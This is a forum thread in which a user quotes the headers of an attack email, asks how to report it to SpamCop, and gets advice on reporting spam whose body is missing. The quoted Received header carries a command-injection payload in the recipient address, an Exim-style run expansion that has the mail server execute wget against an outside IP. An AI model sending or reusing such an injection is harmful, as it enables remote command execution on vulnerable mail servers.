Jump to content

spam with entire contents in ENVELOPE_TO

Recommended Posts

I've been receiving a fair bit of attack email (not precisely "spam") that looks like this:

Return-Path: <root@sab.com>
Received: from sab.com (server.mjm3d.ir [])
    by carlson.workingcode.com (8.15.2/8.15.2/SUSE Linux 0.8) with SMTP id x6BEj0kO003665
    for <root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x20199.204.214.40\x2fsbz\x2f50.78.21.49\x22}}@carlson.workingcode.com>; Thu, 11 Jul 2019 10:45:02 -0400
Authentication-Results:carlson.workingcode.com; dkim=permerror (bad message/signature format)
Date: Thu, 11 Jul 2019 10:45:00 -0400
From: root@sab.com
Message-Id: <201907111445.x6BEj0kO003665@carlson.workingcode.com>
Received: 1
Received: 31
To: undisclosed-recipients:;

The body is empty, and thus the spamcop web UI won't allow me to report it.  As you can see above, the entire contents of message is actually contained in the ENVELOPE_TO -- it's apparently an attempt to get some sort of defective mail delivery agent to execute a shell scri_pt so that the sender can build a database of vulnerable systems.

It would be nice to be able to report the sender and the site he's using for his data gathering (  I'm doing it manually now, but having this sort of thing supported through spamcop would, I think, make some sense.

Link to comment
Share on other sites

  • 2 weeks later...

In the case where the body is missing in the original spam, It is OK to add something like "Body Missing"

Be sure to include a blank line to mark the end of the header.

It is of course to late to report this example.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Create New...